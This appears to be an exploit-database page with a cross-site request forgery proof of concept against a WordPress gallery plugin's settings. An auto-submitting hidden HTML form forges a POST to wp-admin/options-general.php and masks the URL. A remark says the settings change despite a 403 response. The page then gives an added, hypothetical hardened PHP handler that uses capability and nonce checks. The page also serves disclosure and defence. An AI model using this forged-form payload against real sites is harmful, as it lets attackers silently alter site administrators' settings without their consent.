## https://sploitus.com/exploit?id=WPEX-ID:49B3A8CB-F606-4CF7-80EC-BFDAFD74E848
```html
<html>
<body>
<form action="http://WP/wp-admin/options-general.php" method="POST">
<input type="hidden" name="bar_size" value="anything" />
<input type="hidden" name="indexIndicatorSep" value="anything" />
<input type="hidden" name="loop_images" value="1" />
<input type="hidden" name="show_close_element" value="1" />
<input type="hidden" name="show_fullscreen_element" value="1" />
<input type="hidden" name="show_zoom_element" value="1" />
<input type="hidden" name="show_share_element" value="1" />
<input type="hidden" name="show_counter_element" value="1" />
<input type="hidden" name="show_arrow_element" value="1" />
<input type="hidden" name="show_preloader_element" value="1" />
<input type="hidden" name="tap_to_toggle_controls" value="1" />
<input type="hidden" name="photoswipe_save" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
The response to the request above is 403, but the settings update still happens.
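
A hardened settings-save handler for the fields in the form above, as an added example that is not the plugin's own code: the option name, nonce action, hook choice and function names are hypothetical. It checks the capability and a nonce inside the handler before any write, so a forged cross-site POST is refused regardless of the status code the surrounding page returns.

```php
<?php
// Added example: hypothetical handler, not the plugin's own code.
// Field names come from the form above; the option name, nonce action,
// hook and function names are assumptions made for illustration.
const EXAMPLE_NONCE_ACTION = 'example_photoswipe_save';
const EXAMPLE_OPTION_NAME  = 'example_photoswipe_options';

// Call inside the settings <form> so each legitimate POST carries a nonce.
function example_render_nonce() {
    wp_nonce_field( EXAMPLE_NONCE_ACTION );
}

function example_save_settings() {
    if ( ! isset( $_POST['photoswipe_save'] ) ) {
        return; // Not this form's submission.
    }
    // Authorisation is enforced in the handler itself: the page reports that
    // the settings changed even though the response was 403, so the status
    // of the surrounding admin page cannot be relied on as the gate.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // CSRF check: dies unless the POST carries a valid _wpnonce for this
    // action, which a form hosted on another origin cannot supply.
    check_admin_referer( EXAMPLE_NONCE_ACTION );

    // Only after both checks: copy an allow-list of keys, never all of $_POST.
    $flags = array(
        'loop_images', 'show_close_element', 'show_fullscreen_element',
        'show_zoom_element', 'show_share_element', 'show_counter_element',
        'show_arrow_element', 'show_preloader_element', 'tap_to_toggle_controls',
    );
    $options = array();
    foreach ( $flags as $key ) {
        $options[ $key ] = isset( $_POST[ $key ] ) && '1' === $_POST[ $key ];
    }
    foreach ( array( 'bar_size', 'indexIndicatorSep' ) as $key ) {
        $raw             = isset( $_POST[ $key ] ) && is_string( $_POST[ $key ] ) ? $_POST[ $key ] : '';
        $options[ $key ] = sanitize_text_field( wp_unslash( $raw ) );
    }
    update_option( EXAMPLE_OPTION_NAME, $options );
}
add_action( 'admin_init', 'example_save_settings' );
```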